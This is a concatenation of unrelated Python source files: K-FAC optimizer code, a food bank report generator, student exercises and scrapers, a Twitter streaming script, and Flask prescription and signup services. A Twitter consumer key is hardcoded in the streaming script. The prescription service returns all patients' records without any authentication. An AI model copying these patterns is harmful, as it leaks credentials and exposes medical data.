# this at all. Ideally these values should never be used until they are
# updated at least once.
with tf.variable_scope(self._var_scope):
Pmat = tf.get_variable( # pylint: disable=invalid-name
"Lmat_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
Kmat = tf.get_variable( # pylint: disable=invalid-name
"Kmat_damp{}".format(damping_string),
initializer=inverse_initializer,
shape=self._cov_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
mu = tf.get_variable(
"mu_damp{}".format(damping_string),
initializer=tf.ones_initializer(),
shape=self._vec_shape,
trainable=False,
dtype=self._dtype,
use_resource=True)
assert damping_id not in self._option2quants_by_damping
self._option2quants_by_damping[damping_id] = (Pmat, Kmat, mu)
def make_inverse_update_ops(self):
"""Create and return update ops corresponding to registered computations."""
# TODO(b/69918258): Add correctness tests for this method.
# pylint: disable=invalid-name
ops = []
if (len(self._option1quants_by_damping) +
len(self._option2quants_by_damping)):
# Note that C0 and C1 are stand-ins for A0 and A1, or G0 and G1, from
# the pseudo-code in the original paper. Because the computations for
# the A and G case are essentially the same they can both be performed by
# the same class (this one).
C1 = self.cov_dt1
# Get the eigendecomposition of C0 (= self.cov)
eigen_e, eigen_V = self.get_eigendecomp()
# TODO(b/69678661): Note, there is an implicit assumption here that C1
# and C0 (as represented here by its eigen-decomp) are consistent. This
# could fail to be the case if self._cov and self._cov_dt1 are not updated
# consistently, or are somehow read between or during the cov updates.
# Can this possibly happen? Is there a way to prevent it?
for damping_id, (Lmat_var,
psi_var) in self._option1quants_by_damping.items():
damping = self._damping_funcs_by_id[damping_id]()
damping = tf.cast(damping, self._dtype)
invsqrtC0 = tf.matmul(
eigen_V * (eigen_e + damping)**(-0.5), eigen_V, transpose_b=True)
# Might need to enforce symmetry lost due to numerical issues.
invsqrtC0 = (invsqrtC0 + tf.transpose(invsqrtC0)) / 2.0
# The following line imposes the symmetry assumed by "Option 1" on C1.
# Strangely the code can work okay with this line commented out,
# depending on how psd_eig is defined. I'm not sure why.
C1 = (C1 + tf.transpose(C1)) / 2.0
# hPsi = C0^(-1/2) * C1 * C0^(-1/2) (hPsi means hat{Psi})
hPsi = tf.matmul(tf.matmul(invsqrtC0, C1), invsqrtC0)
# Compute the decomposition U*diag(psi)*U^T = hPsi
psi, U = utils.posdef_eig(hPsi)
# L = C0^(-1/2) * U
Lmat = tf.matmul(invsqrtC0, U)
ops.append(utils.smart_assign(Lmat_var, Lmat))
ops.append(utils.smart_assign(psi_var, psi))
for damping_id, (Pmat_var, Kmat_var,
mu_var) in self._option2quants_by_damping.items():
damping = self._damping_funcs_by_id[damping_id]()
damping = tf.cast(damping, self._dtype)
# compute C0^(-1/2)
invsqrtC0 = tf.matmul(
eigen_V * (eigen_e + damping)**(-0.5), eigen_V, transpose_b=True)
# Might need to enforce symmetry lost due to numerical issues.
invsqrtC0 = (invsqrtC0 + tf.transpose(invsqrtC0)) / 2.0
# Compute the product C0^(-1/2) * C1
invsqrtC0C1 = tf.matmul(invsqrtC0, C1)
# hPsi = C0^(-1/2) * C1 * C0^(-1/2) (hPsi means hat{Psi})
hPsi = tf.matmul(invsqrtC0C1, invsqrtC0)
# Compute the decomposition E*diag(mu)*E^T = hPsi^T * hPsi
# Note that we using the notation mu instead of "m" for the eigenvalues.
# Instead of computing the product hPsi^T * hPsi and then doing an
# eigen-decomposition of this we just compute the SVD of hPsi and then
# square the singular values to get the eigenvalues. For a justification
# of this approach, see:
# https://en.wikipedia.org/wiki/Singular-value_decomposition#Relation_to_eigenvalue_decomposition
sqrtmu, _, E = tf.svd(hPsi)
mu = tf.square(sqrtmu)
# Mathematically, the eigenvalues should not should not exceed 1.0, but
# due to numerical issues, or possible issues with inconsistent
# values of C1 and (the eigen-decomposition of) C0 they might. So
# we enforce this condition.
mu = tf.minimum(mu, 1.0)
# P = (C0^(-1/2) * C1)^T * C0^(-1/2) = C_1^T * C_0^(-1)
Pmat = tf.matmul(invsqrtC0C1, invsqrtC0, transpose_a=True)
# K = C_0^(-1/2) * E
Kmat = tf.matmul(invsqrtC0, E)
ops.append(utils.smart_assign(Pmat_var, Pmat))
ops.append(utils.smart_assign(Kmat_var, Kmat))
ops.append(utils.smart_assign(mu_var, mu))
ops += super(FullyConnectedMultiKF, self).make_inverse_update_ops()
return [tf.group(*ops)]
# pylint: enable=invalid-name
``` |
{
"source": "2018-Arizona-Opportunity-Hack/Team15",
"score": 3
} |
#### File: Team15/FBM Utility/GenerateMonthlyReport.py
```python
import sys
import calendar
import datetime
from dateutil.relativedelta import relativedelta
import sys
import operator
import pandas as pd
import numpy as np
import openpyxl
from FoodBankManager import FBM
import FixedData
def add_data(chart, data, from_rows=False, titles_from_data=False, title=None):
"""
Add a range of data in a single pass.
The default is to treat each column as a data series.
"""
if not isinstance(data, openpyxl.chart.Reference):
data = openpyxl.chart.Reference(range_string=data)
if from_rows:
values = data.rows
else:
values = data.cols
for v in values:
range_string = u"{0}!{1}:{2}".format(data.sheetname, v[0], v[-1])
series = openpyxl.chart.series_factory.SeriesFactory(range_string, title_from_data=titles_from_data, title=title)
self.ser.append(series)
def FindLastMonthsDates():
"""
Finds the first and last days of last month
:return: (first_of_month, last_of_month)
:rtype: tuple(datetime.date, datetime.date)
"""
now = datetime.date.today()
last_of_month = now.replace(day=1) - datetime.timedelta(days=1)
first_of_month = last_of_month.replace(day=1)
return first_of_month, last_of_month
def RunMonthlyReport(FBMInst,month=None, year=None):
if month is not None and year is not None:
start = datetime.date(year, month, 1)
end = datetime.date(year, month, calendar.monthrange(year, month)[1])
else:
start, end = FindLastMonthsDates()
data = FBMInst.GetFoodDonations(start, end)
data[["Weight (lbs)"]] = data[["Weight (lbs)"]].astype("float")
return data
def PivotInventoryTable(df):
df[["Weight (lbs)"]] = df[["Weight (lbs)"]].astype("float")
df = pd.pivot_table(df, index=["DonorCategory"], values=["Weight (lbs)"], aggfunc=[np.sum])
return df
def MonthlyGuestData(FBMInst,month=None, year=None):
if month is not None and year is not None:
start = datetime.date(year, month, 1)
end = datetime.date(year, month, calendar.monthrange(year, month)[1])
else:
start, end = FindLastMonthsDates()
data = FBMInst.GetGuestData(start, end)
data[["Tracking Result"]] = data[["Tracking Result"]].astype("int")
return data
def WriteSummaryData(q, ws, origin=(1,1), month=None, year=None, existing_clients=None, inventory_adjust=0, donor_catagories=[]):
if month is not None and year is not None:
start = datetime.date(year, month, 1)
end = datetime.date(year, month, calendar.monthrange(year, month)[1])
else:
start, end = FindLastMonthsDates()
donation_data = RunMonthlyReport(q, month=start.month, year=start.year)
user_data = MonthlyGuestData(q, month=start.month, year=start.year)
clients = set(user_data["Guest ID"].unique())
if existing_clients is None:
existing_clients = set()
new_clients = set([c for c in clients if c not in existing_clients])
ws.column_dimensions[ws.cell(row=origin[0], column=origin[1]).column].width = 14
for cell_row in range(origin[0], origin[0] + len(donor_catagories) + 10 + 1):
ws.cell(row=cell_row, column=origin[1]).style = "Input"
ws.cell(row=origin[0], column=origin[1]).value = "{}".format(start.strftime("%B %Y"))
ws.cell(row=origin[0], column=origin[1]).style = "Headline 4"
ws.cell(row=origin[0], column=origin[1]).alignment = openpyxl.styles.Alignment(horizontal='center')
for i, item in enumerate(donor_catagories):
ws.cell(row=origin[0] + i + 1, column=origin[1]).value = donation_data[donation_data["DonorCategory"] == item].sum()["Weight (lbs)"]
ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).value = "=SUM({}:{})".format(ws.cell(row=origin[0] + 1, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories), column=origin[1]).coordinate)
ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).style = "Calculation"
ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).value = donation_data[donation_data["DonorCategory"] == "Waste"].sum()["Weight (lbs)"]
ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).value = "={}-{}".format(ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).coordinate)
ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).style = "Calculation"
ws.cell(row=origin[0] + len(donor_catagories) + 4, column=origin[1]).style = "Normal"
if (month, year) in FixedData.override.keys():
ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = FixedData.override[(month, year)]["clients"]
ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = FixedData.override[(month, year)]["new_clients"]
ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = FixedData.override[(month, year)]["impact"]
else:
ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = len(clients)
ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = len(new_clients)
ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = user_data["Tracking Result"].sum()
ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).value = "={}*{}".format(ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).coordinate, FixedData.output_weight)
ws.cell(row=origin[0] + len(donor_catagories) + 9, column=origin[1]).style = "Normal"
ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]).value = "=IF(ISTEXT({0:}), {2:}-{1:}, {2:}-{1:}+{0:})+({3:})".format(ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]-1).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).coordinate, inventory_adjust)
return existing_clients.union(new_clients)
def WriteSummaryLabel(ws, origin=(1,1), donor_catagories=[]):
ws.column_dimensions[ws.cell(row=origin[0], column=origin[1]).column].width = 22
for i, item in enumerate(donor_catagories):
ws.cell(row=origin[0] + i + 1, column=origin[1]).value = "{} (lbs)".format(item)
ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).value = "Total Food Income (lbs)"
ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).value = "Waste (lbs)"
ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).value = "Total Collected (lbs)"
ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = "Number of Clients"
ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = "New Clients"
ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = "Total Impact"
ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).value = "Food Distributed (lbs)"
ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]).value = "Ending Inventory (lbs)"
for cell_row in range(origin[0], origin[0] + len(donor_catagories) + 10 + 1):
ws.cell(row=cell_row, column=origin[1]).style = "Headline 4"
def WriteExcelSheet(name, month=None, year=None):
if month is not None and year is not None:
start = datetime.date(year, month, 1)
end = datetime.date(year, month, calendar.monthrange(year, month)[1])
else:
start, end = FindLastMonthsDates()
q = FBM("mcfb.soxbox.co")
wb = openpyxl.Workbook()
ws = wb.active
ws.title = "12 Month Overview"
# borrowed code from GenerateGraphs.py figures inventory adjustment and proper categories
if month is not None and year is not None:
x_end = datetime.datetime(year, month, 1)
else:
x_now = datetime.datetime.now()
x_end = datetime.datetime(x_now.year, x_now.month, 1)
x_end = x_end + relativedelta(months=+1)
x_start = x_end + relativedelta(months=-13)
food_data = q.GetFoodDonations(x_start, x_end)
guest_data = q.GetGuestData(x_start, x_end)
food_data[u'Donated On'] = pd.to_datetime(food_data[u'Donated On']).astype(datetime.datetime)
food_data[u'Weight (lbs)'] = food_data[u'Weight (lbs)'].astype(float)
guest_data[u'Outreach on'] = pd.to_datetime(guest_data[u'Outreach on']).astype(datetime.datetime)
guest_data[u'Tracking Result'] = guest_data[u'Tracking Result'].astype(int)
period_start = x_start
inventory = 0
inventory_adjust = 0
categories = set(["Grocery", "Org/Corp"])
for i in range(13):
period_end = period_start + relativedelta(months=+1)
food_month = food_data[(food_data[u'Donated On'] >= period_start) & (food_data[u'Donated On'] < period_end)]
guest_month = guest_data[(guest_data[u'Outreach on'] >= period_start) & (guest_data[u'Outreach on'] < period_end)]
month_clients = len(set(guest_month[u'Guest ID'].unique()))
if (period_start.month, period_start.year) in FixedData.override.keys():
month_clients = FixedData.override[(period_start.month, period_start.year)]['clients']
intake_total = food_month[food_month[u'DonorCategory'] != u'Waste'][u'Weight (lbs)'].sum()
waste_total = food_month[food_month[u'DonorCategory'] == u'Waste'][u'Weight (lbs)'].sum()
output_total = month_clients * FixedData.output_weight
food_out_total = waste_total + output_total
if i > 0 and (period_start.month, period_start.year) in FixedData.inventory.keys():
inventory_adjust = (FixedData.inventory[(period_start.month, period_start.year)] - (intake_total - food_out_total)) - inventory
#print("FixedData.inventory[({}, {})] = {}; intake_total = {}; waste_total = {}; output_total = {}; food_out_total = {}; month net food is {}; tallied inventory is {} => inventory_adjust = {}".format(period_start.month, period_start.year, FixedData.inventory[(period_start.month, period_start.year)], intake_total, waste_total, output_total, food_out_total, intake_total - food_out_total, inventory, inventory_adjust))
if i > 0:
inventory += (intake_total - (waste_total + output_total))
#print("intake={}, waste={}, output={}, delta={}, inventory={}".format(intake_total, waste_total, output_total, (intake_total - (waste_total + output_total)), inventory))
food_datums = RunMonthlyReport(q, month=period_start.month, year=period_start.year)
if not food_datums.empty:
messy_data = PivotInventoryTable(food_datums)
useful_data = messy_data.to_dict()[('sum', 'Weight (lbs)')]
sorted_data = zip(*sorted(useful_data.items(), key=operator.itemgetter(1), reverse=True))
categories = categories.union(sorted_data[0])
period_start = period_end
if u'Waste' in categories:
categories.remove(u'Waste')
WriteSummaryLabel(ws, origin=(2, 1), donor_catagories=categories)
ym_start = 12 * year + month - 1
clients = set()
adjusted = False
for i, ym in enumerate(range(ym_start - 11, ym_start + 1)):
y, m = divmod(ym, 12)
if not adjusted:
clients = WriteSummaryData(q, ws, origin=(2, i+2), month=m+1, year=y, existing_clients=clients, inventory_adjust=inventory_adjust, donor_catagories=categories)
adjusted = True
else:
clients = WriteSummaryData(q, ws, origin=(2, i+2), month=m+1, year=y, existing_clients=clients, donor_catagories=categories)
ws.merge_cells('B1:M1')
for col in ['B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M']:
ws['{}1'.format(col)].style = "Headline 1"
ws['B1'] = "12 Month Overview"
ws['B1'].alignment = openpyxl.styles.Alignment(horizontal='center')
ws['N1'] = "Last Year's Performance"
ws['N1'].style = "Headline 1"
WriteSummaryData(q, ws, origin=(2, 14), month=month, year=year-1, donor_catagories=categories)
ws.column_dimensions['N'].width = 30
ws['N{}'.format(8+len(categories))].style = "Normal"
ws['N{}'.format(8+len(categories))] = ""
ws['N{}'.format(12+len(categories))].style = "Normal"
ws['N{}'.format(12+len(categories))] = ""
ws.freeze_panes = "B3"
c1 = openpyxl.chart.LineChart()
c1.title = "Food Income (Lbs), Large sources"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A3:M4"))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "B22")
c1 = openpyxl.chart.LineChart()
c1.title = "Food Income (Lbs), All Other Sources"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A5:M{}".format(2+len(categories))))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "H22")
c1 = openpyxl.chart.LineChart()
c1.title = "Ending Inventory (lbs)"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{0}".format(12+len(categories))))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "N22")
c1 = openpyxl.chart.LineChart()
c1.title = "Waste (lbs)"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{0}".format(4+len(categories))))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "B37")
c1 = openpyxl.chart.LineChart()
c1.title = "Clients"
data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{1}".format(7+len(categories), 9+len(categories))))
c1.add_data(data, titles_from_data=True, from_rows=True)
ws.add_chart(c1, "H37")
filename = "{}.xlsx".format(name)
wb.save(filename)
return filename
if __name__ == '__main__':
pd.set_option('display.expand_frame_repr', False)
if len(sys.argv) < 3:
print "Run with \"<month number (1-12)> <Year (4 digit)>\""
print WriteExcelSheet("out/Report {}-{}".format(sys.argv[1], sys.argv[2]), month=int(sys.argv[1]), year=int(sys.argv[2]))
``` |
{
"source": "2018-B-GR1-Python/Velasco-Yepez-Andres-David",
"score": 4
} |
#### File: Velasco-Yepez-Andres-David/01-Python/09_classes.py
```python
class Escuela:
# valor_categoria = 4
__ciudad = 'Quito' # atributo privado
pais = 'Ecuador' # atributo publico
def __init__(self, nombre, valor_categoria=4):
print(self)
print('Hola constructor')
self.nombre = nombre
self.valor_categoria = valor_categoria
def saludar(self):
print(f'Hola desde {self.nombre} localizada en'
f' {self.__ciudad} - {self.pais}')
def categoria(self):
return self.__calcular_categoria()
def __calcular_categoria(self): # metodo privado
return self.valor_categoria * 3
def __str__(self):
return 'Escuela'
twa = Escuela('Theodoro Winword Anderson')
twa.valor_categoria = 2
twa.saludar()
print(twa.categoria())
class Auto:
_ensamblado = 'Quito'
numero_asientos = 5
def __init__(self, nombre, color):
self.nombre = nombre
self.color = color
def __init__(self, nombre, color, color_techo=''):
self.nombre = nombre
self.color = color
self.color_techo = color_techo
def cambiar_ensamblado(self, ensamblado):
self._ensamblado = ensamblado
def __maximo_numero_pasajeros(self):
return self.numero_asientos + 3
def __str__(self):
return (f"{self.nombre}\n"
f"{self.color}\n"
f"{self.color_techo}\n"
f"{self.numero_asientos}\n"
f"{self._ensamblado}\n"
f"{self.__maximo_numero_pasajeros()}\n")
bmw = Auto('Blanco', 'Version 1')
print(bmw)
class Hyundai(Auto):
def __init__(self, color, nombre):
super().__init__(color=color, nombre=nombre)
print('constructor')
print(self._ensamblado)
mi_carro = Hyundai('Negro', 'Santa fe')
print(mi_carro)
```
#### File: python_01/spiders/intro_spider_01.py
```python
import scrapy
nombre_archivo = 'libros.csv'
def guardar_archivo(titulos, precios, stocks):
lista_stock = []
for stock in stocks:
if 'In stock' in stock:
lista_stock.append('1')
else:
lista_stock.append('0')
import csv
with open(nombre_archivo, 'w', newline='') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
data = list(zip(titulos, precios, lista_stock))
for row in data:
row = list(row)
spamwriter.writerow(row)
print("Listo :)")
class MiPrimerSpider(scrapy.Spider):
name = 'intro_spider'
def start_requests(self):
urls = [
'http://books.toscrape.com/catalogue/page-1.html',
'http://books.toscrape.com/catalogue/page-2.html',
'http://books.toscrape.com/catalogue/page-3.html',
]
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
titulos = response.css('article > h3 > a::text').extract()
precios = response.css('article > div > p:nth-child(1)::text').extract()
stocks = response.xpath(
"/html/body/div/div/div/div/section/div/ol/li/article/div/p[@class='instock availability']/text()")\
.extract()
guardar_archivo(titulos,precios,stocks)
```
#### File: python_04/python_04/items.py
```python
import scrapy
from scrapy.loader.processors import MapCompose
def shorten_amazon_link(link):
id_producto = link.split('/')[-1] # ultimo elemento
short_link = 'https://www.amazon.com/dp/' + id_producto
return short_link
class ProductoItem(scrapy.Item):
titulo = scrapy.Field()
precio = scrapy.Field()
link = scrapy.Field(
input_processor=MapCompose(shorten_amazon_link)
)
```
#### File: python_04/spiders/input_processor.py
```python
import scrapy
from scrapy.loader import ItemLoader
from scrapy.loader.processors import MapCompose
from scrapy.loader.processors import TakeFirst
from python_04.items import ProductoItem
def truncar_texto(texto):
return texto[:50]
class DetallesProducto(scrapy.Spider):
name = 'novicompu'
start_urls = [
'https://www.novicompu.com/12-laptops'
]
def parse(self, response):
resultados_busqueda = response.css('div.product-container > div')
for producto in resultados_busqueda:
producto_loader = ItemLoader(
item=ProductoItem(),
selector=producto
)
producto_loader.default_input_processor = MapCompose(truncar_texto)
producto_loader.default_output_processor = TakeFirst()
titulo = producto_loader.add_css('titulo', 'h5 > a.product-name::text')
precio = producto_loader.add_css('precio', 'span.price.product-price::text')
link = producto_loader.add_css('link', 'h5 > a.product-name::attr(href)')
print(titulo, precio, link)
yield producto_loader.load_item() # Es un return q no para el loop
```
#### File: Velasco-Yepez-Andres-David/Proyecto2BIM/get_tweets.py
```python
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
# API CREDENTIALS
ckey = "XTwJNYD8b9bekoIvJ4q5j1JUf"
csecret = "<KEY>"
atoken = "<KEY>"
asecret = "<KEY>"
class listener(StreamListener):
def on_data(self, data):
with open('tweets_mexico.json', 'a') as diccionario:
diccionario.write(data+",")
return True
def on_error(self, status):
print (status)
auth = OAuthHandler(ckey, csecret)
auth.set_access_token(atoken, asecret)
twitterStream = Stream(auth, listener())
filters = [
'donaldtrump',
'trump',
'goverment',
'whitehouse',
'Trump'
]
# EEUU = -120.3,29.7,-87.8,46.3
# RUS = 37.28,52.72,91.07,66.19
# JAPON 131.46,30.57,146.57,44.94
# MEXICO -113.13,11.19,-88.91,31.74
twitterStream.filter(locations=[-113.13,11.19,-88.91,31.74], track=filters)
```
#### File: Velasco-Yepez-Andres-David/proyecto/crud.py
```python
import pandas as pd
url = 'http://catalogo.datosabiertos.gob.ec/api/action/datastore_search?resource_id=8513f446-1c94-426e-8592-d4cbdd295f33&limit=1000'
datos = pd.read_json(url, typ='frame')
datos =pd.DataFrame.from_dict(datos["result"]["records"]).set_index("_id")
def guardar_bdd():
global datos
datos.to_csv('./data/bdd_homicidios.csv', encoding='utf-8')
def consultar(columna, id=None):
global datos
#print(datos.loc[int(id),columna])
return datos.loc[int(id),columna] if id else datos[columna]
def modificar(columna,id,nuevo_valor):
global datos
if consultar(columna, id):
datos.at[int(id),columna] = nuevo_valor
guardar_bdd()
return True
else:
return False
def eliminar(index):
global datos
datos.drop(datos.index[int(index)-1], inplace=True)
guardar_bdd()
def insertar(Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz):
global datos
homicidio=Homicidio(Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz)
s = homicidio.get_list()
serie = pd.Series(s,index=datos.columns)
datos = datos.append(serie,ignore_index=True)
guardar_bdd()
class Homicidio:
def __init__(self,Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz):
self.Canton=Canton
self.Circuito=Circuito
self.Distrito=Distrito
self.Edad = Edad
self.Estado_civil=Estado_Civil
self.Fecha_infraccion=Fecha_infraccion
self.Hora_infraccion=Hora_infraccion
self.Nacionalidad=Nacionalidad
self.Provincia = Provincia
self.Sexo = Sexo
self.Zona = Zona
self.tipo = tipo_muert_matriz
def get_list(self):
return [self.Canton,self.Circuito,self.Distrito,self.Edad,self.Estado_civil,self.Fecha_infraccion,
self.Hora_infraccion,self.Nacionalidad,self.Provincia,self.Sexo,self.Zona,self.tipo]
def menu():
print("Que desea hacer:")
print("1. Crear:")
print("2. Modificar")
print("3 Consultar")
print("4. Eliminar")
opcion = input("Opcion: ")
if opcion == "1":
Canton = input("Canton: ")
Circuito = input("Circuito: ")
Distrito = input("Distrito: ")
Edad = input("Edad: ")
Estado_civil = input("Estado civil: ")
Fecha_infraccion = input("Fecha infraccion: ")
Hora_infraccion = input("Hora infraccion: ")
Nacionalidad = input("Nacionalidad: ")
Provincia = input("Provincia: ")
Sexo = input("Sexo: ")
Zona = input("Zona: ")
Tipo = input("Tipo: ")
insertar(Canton, Circuito, Distrito, Edad, Estado_civil, Fecha_infraccion, Hora_infraccion, Nacionalidad,
Provincia, Sexo, Zona, Tipo)
if opcion == "2":
columna = input("Columna: ")
id = input("id: ")
nuevo_valor = input("nuevo_valor: ")
modificar(columna,id,nuevo_valor)
if opcion == "3":
columna = input("Columna: ")
id = input("id: ")
print(consultar(columna, id))
if opcion == "4":
id = input("id: ")
eliminar(id)
menu()
menu()
``` |
{
"source": "2018-BigBio-MedicalData-Hackathon/server",
"score": 3
} |
#### File: 2018-BigBio-MedicalData-Hackathon/server/agency.py
```python
from flask import Flask, request, jsonify, json
from flask_restful import reqparse, Api, Resource
import config
import dbconnect
import json
app = Flask(__name__)
api = Api(app)
# MySQL 연결
cursor = dbconnect.cursor
conn = dbconnect.conn
# /Agency 구현
class Agency(Resource):
#병원이 보내는 처방전 서버에 저장하기
def post(self):
try:
# json 데이터 post로 받아서 변수 저장
_content = request.get_json()
_insurance = _content['insurance']
_nursesign = _content['nursing_institution_sign']
_grantnum = _content['grant_number']
_patientname = _content['patient']['name']
_patientreginum = _content['patient']['registration_number']
_insname = _content["medical_Institutions"]["name"]
_insphonenum = _content["medical_Institutions"]["phone_number"]
_insfaxnum = _content["medical_Institutions"]["fax_number"]
_insemail = _content["medical_Institutions"]["email_address"]
_diseasecode1 = _content["disease_classification_codes"][0]
_diseasecode2 = _content["disease_classification_codes"][1]
_doctorname = _content["sign_of_prescription_medical_practitioner"]
_doctortype = _content["license_type"]
_doctornum = _content["license_number"]
_mediname = []
_medidose = []
_medidailydose = []
_meditotalday = []
_mediusage = []
_mediinside = []
for data in _content["prescription_medicine"]:
_mediname.append(data["name_of_medicines"])
_medidose.append(data["one_dose"])
_medidailydose.append(data["number_of_daily_doses"])
_meditotalday.append(data["total_dosing_days"])
_mediusage.append(data["usage"])
_mediinside.append(data["inside"])
_usepreiod = _content["injection_prescription"]["period_of_use"]
_dispensename = _content["injection_prescription"]["preparation"]["name_of_dispenser"]
_pharmacistname = _content["injection_prescription"]["preparation"]["pharmacist"]["name"]
_pharmacistseal = _content["injection_prescription"]["preparation"]["pharmacist"]["seal"]
_preparationamount = _content["injection_prescription"]["preparation_amount"]
_preparationyear = _content["injection_prescription"]["year_of_preparation"]
_changeprescription = _content["injection_prescription"]["change_of_prescription"]
_query = "INSERT INTO prescription(insurance, nurse_sign, grant_num, patient_name, patient_reginum, ins_name, ins_phonenum, ins_fax, ins_email, diseasecode_1, diseasecode_2, doctor_name, doctor_type, doctor_num, medi_name, medi_dose, medi_dailydose, medi_totalday, medi_usage, medi_inside, period_use, dispenser_name, pharmacist_name, pharmacist_seal, preparation_amount, year_preparation, change_prescription) values( %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s)"
print(_query)
_value = (_insurance ,_nursesign, _grantnum, _patientname ,_patientreginum ,_insname , _insphonenum , _insfaxnum , _insemail ,str(_diseasecode1) ,str(_diseasecode2),_doctorname , _doctortype , _doctornum ,str(_mediname) ,str(_medidose) ,str(_medidailydose) ,str(_meditotalday) , str(_mediusage) ,str(_mediinside) ,_usepreiod ,_dispensename ,_pharmacistname , _pharmacistseal , _preparationamount ,_preparationyear , _changeprescription )
print(_value)
cursor.execute(_query, _value)
_data = cursor.fetchall()
print(_data)
if not _data:
conn.commit()
return {"Register Success": 200}
else:
conn.rollback()
return {"Register Failed": 404}
except Exception as e:
return {'error': e}
def get(self):
try:
# json 데이터 post로 받아서 변수 저장
_query = "select * from prescription"
cursor.execute(_query)
_data = cursor.fetchall()
result= []
for data in _data:
_insurance = data[1]
_nursesign = data[2]
_grantnum = data[3]
_patientname = data[4]
_patientreginum = data[5]
_insname = data[6]
_insphonenum = data[7]
_insfaxnum = data[8]
_insemail = data[9]
_diseasecode1 = data[10]
_diseasecode2 = data[11]
_doctorname = data[12]
_doctortype = data[13]
_doctornum = data[14]
_mediname = data[15]
_medidose = data[16]
_medidailydose = data[17]
_meditotalday = data[18]
_mediusage = data[19]
_mediinside = data[20]
_usepreiod = data[21]
_dispensename = data[22]
_pharmacistname = data[23]
_pharmacistseal = data[24]
_preparationamount = data[25]
_preparationyear = data[26]
_changeprescription = data[27]
tempjson= { "insurance":_insurance ,"nursesign": _nursesign,"grantnum": _grantnum , "patientname":_patientname ,"patientreginum" :_patientreginum ,"insname" : _insname ,"insphonenum": _insphonenum ,"insfaxnum": _insfaxnum , "insemail": _insemail ,"diseasecode1": _diseasecode1 ,"diseasecode2": _diseasecode2,"doctorname": _doctorname ,"doctortype": _doctortype ,"doctornum": _doctornum ,"mediname": _mediname ,"medidose": _medidose ,"medidailydose":_medidailydose ,"meditotalday" :_meditotalday , "mediusage":_mediusage ,"mediinside": _mediinside ,"usepreiod": _usepreiod ,"dispensename": _dispensename ,"pharmacistname": _pharmacistname , "pharmacistseal": _pharmacistseal ,"preparationamount": _preparationamount ,"preparationyear": _preparationyear , "changeprescription": _changeprescription }
result.append(tempjson)
# resultjson = json.dumps(result)
return result
except Exception as e:
return {'error': e}
```
#### File: 2018-BigBio-MedicalData-Hackathon/server/signup.py
```python
from flask import Flask, render_template, Response, request, session
from flask_restful import Resource, Api
from flask_restful import reqparse
import config
import random
import hashlib
import dbconnect
app = Flask(__name__)
api = Api(app)
# MySQL 연결
cursor = dbconnect.cursor
conn = dbconnect.conn
# salt 생성
def salt():
alphabet = "0123456789abcdefghijklmnopqrstuvwxyz" + \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%()"
chars = []
for i in range(32):
chars.append(random.choice(alphabet))
return "".join(chars)
# salt+passwd로 passwd 만들기
def makepasswd(passwd, salt):
_data = str.encode(passwd + salt)
_hash = hashlib.sha256()
